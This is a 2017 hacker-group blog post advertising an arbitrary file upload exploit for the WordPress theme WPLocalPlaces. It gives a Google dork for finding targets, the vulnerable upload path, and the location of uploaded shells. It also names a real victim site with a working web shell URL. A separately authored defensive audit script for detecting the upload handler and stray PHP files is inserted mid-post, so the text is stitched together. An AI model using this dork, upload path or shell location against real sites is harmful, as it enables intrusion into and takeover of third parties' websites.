Thursday, May 11, 2017

WordPress Themes WPLocalPlaces Upload Vulnerability


INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title  : WordPress Themes WPLocalPlaces Upload Vulnerability
Google Dork    : inurl:"/wp-content/plugins/spotlightyour/"
Locations      : Banjarmasin, Indonesia
Author         : ovanIsmycode
Contact        : ovanismycode@yahoo.com


Software Link  : http://freelancewp.com/wordpress-theme/wp-local-places/
#################################################################################################

[+] POC

Exp. Target :
- http://domain.com/wp-content/themes/WPLocalPlaces/

Exploit :
- /monetize/upload/index.php

Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php


[+] Demo

Live Target :
http://southbayautopros.com/wp-content/themes/WPLocalPlaces/monetize/upload/index.php
see it http://i.imgur.com/3NsmWdt.jpg

Shell Access :
http://southbayautopros.com/wp-content/uploads/2013/10/13820893341435692459.php
see it http://i.imgur.com/4e8hHzA.jpg
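
A defender-side audit for the paths this advisory names, added here as an example (not code from the advisory's author): it checks whether the theme's monetize/upload/index.php handler is present in an install and lists PHP-executable files under wp-content/uploads. The function names, the extension list and the sample directory tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Relative path of the upload handler named in the advisory.
UPLOAD_HANDLER = "wp-content/themes/WPLocalPlaces/monetize/upload/index.php"
# Extensions commonly mapped to the PHP interpreter (assumption: adjust to
# match the handler mappings in your own web server configuration).
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def audit_wordpress(root):
    """Return (handler_present, sorted PHP-like files found under uploads)."""
    handler = os.path.join(root, *UPLOAD_HANDLER.split("/"))
    handler_present = os.path.isfile(handler)
    uploads = os.path.join(root, "wp-content", "uploads")
    findings = []
    # os.walk yields nothing if the uploads directory does not exist.
    for dirpath, _dirs, files in os.walk(uploads):
        for name in files:
            if PHP_EXT.search(name):
                rel = os.path.relpath(os.path.join(dirpath, name), uploads)
                findings.append(rel.replace(os.sep, "/"))
    return handler_present, sorted(findings)


def build_sample_tree():
    """Constructed sample install: handler present, one script among media."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    for rel in (UPLOAD_HANDLER,
                "wp-content/uploads/2013/10/photo.jpg",
                "wp-content/uploads/2013/10/0000000000.php",  # constructed name
                "wp-content/uploads/2014/01/banner.PNG"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
    return root


if __name__ == "__main__":
    present, hits = audit_wordpress(build_sample_tree())
    print("upload handler present:", present)
    for hit in hits:
        print("script in uploads:", hit)
```

Any hit under uploads deserves review, since WordPress media files do not need to be executable PHP. Removing the theme's upload handler and denying PHP execution in the uploads directory at the web server are the usual mitigations.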
 
#################################################################################################
 
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, N035, -=[The Crows Crew]=-, Indonesian Hacker

thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org